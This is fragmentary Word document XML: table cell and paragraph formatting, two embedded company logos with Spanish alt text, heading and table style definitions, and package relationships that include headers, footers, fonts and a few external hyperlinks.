      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:bottom w:color="808080" w:space="0" w:sz="12" w:val="single"/>
            <w:right w:color="808080" w:space="0" w:sz="12" w:val="single"/>
          </w:tcBorders>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394"/>
              <w:tab w:val="right" w:leader="none" w:pos="8789"/>
              <w:tab w:val="left" w:leader="none" w:pos="1560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
              <w:i w:val="1"/>
              <w:iCs w:val="1"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:i w:val="1"/>
              <w:iCs w:val="1"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="809141" cy="354590"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr descr="Logotipo, nombre de la empresa&#10;&#10;Descripción generada automáticamente" id="3" name="image1.jpg"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr descr="Logotipo, nombre de la empresa&#10;&#10;Descripción generada automáticamente" id="0" name="image1.jpg"/>
                        <pic:cNvPicPr preferRelativeResize="0"/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId1"/>
                        <a:srcRect b="41205" l="31029" r="30985" t="35252"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="809141" cy="354590"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect"/>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
              <w:i w:val="1"/>
              <w:iCs w:val="1"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>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394"/>
              <w:tab w:val="right" w:leader="none" w:pos="8789"/>
              <w:tab w:val="left" w:leader="none" w:pos="1560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
              <w:i w:val="1"/>
              <w:iCs w:val="1"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:left w:color="808080" w:space="0" w:sz="12" w:val="single"/>
            <w:bottom w:color="808080" w:space="0" w:sz="12" w:val="single"/>
          </w:tcBorders>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394"/>
              <w:tab w:val="right" w:leader="none" w:pos="8789"/>
              <w:tab w:val="left" w:leader="none" w:pos="1560"/>
            </w:tabs>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i w:val="1"/>
              <w:iCs w:val="1"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="1628958" cy="526634"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr descr="Logotipo&#10;&#10;Descripción generada automáticamente" id="5" name="image2.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr descr="Logotipo&#10;&#10;Descripción generada automáticamente" id="0" name="image2.png"/>
                        <pic:cNvPicPr preferRelativeResize="0"/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId2"/>
                        <a:srcRect b="22265" l="0" r="0" t="20259"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1628958" cy="5266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394"/>
        <w:tab w:val="right" w:leader="none" w:pos="8789"/>
      </w:tabs>
      <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="000000"/>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394"/>
        <w:tab w:val="right" w:leader="none" w:pos="8789"/>
      </w:tabs>
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>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color w:val="000000"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="397" w:hanging="397"/>
      </w:pPr>
      <w:rPr>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>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1843"/>
      </w:tabs>
      <w:spacing w:after="240" w:lineRule="auto"/>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="792" w:hanging="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="851"/>
      </w:tabs>
      <w:spacing w:after="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="1134"/>
      </w:tabs>
      <w:spacing w:after="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="1134"/>
      </w:tabs>
      <w:spacing w:after="240" w:lineRule="auto"/>
      <w:ind w:left="1134" w:hanging="1134"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:before="40" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="243f6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tabs>
        <w:tab w:val="left" w:leader="none" w:pos="1843"/>
      </w:tabs>
      <w:spacing w:after="240" w:lineRule="auto"/>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table2">
    <w:basedOn w:val="TableNormal"/>
    <w:rPr>
      <w:rFonts w:ascii="Kreon" w:cs="Kreon" w:eastAsia="Kreon" w:hAnsi="Kreon"/>
      <w:color w:val="aa0a2e"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>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greshunka.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.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tiguanin.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bazarunet.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jp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Kreon-regular.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Kreon-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0x0101009B720BF5E7469943B2EBDCAF79B5D7C0</vt:lpwstr>
  </property>
</Properties>
</file>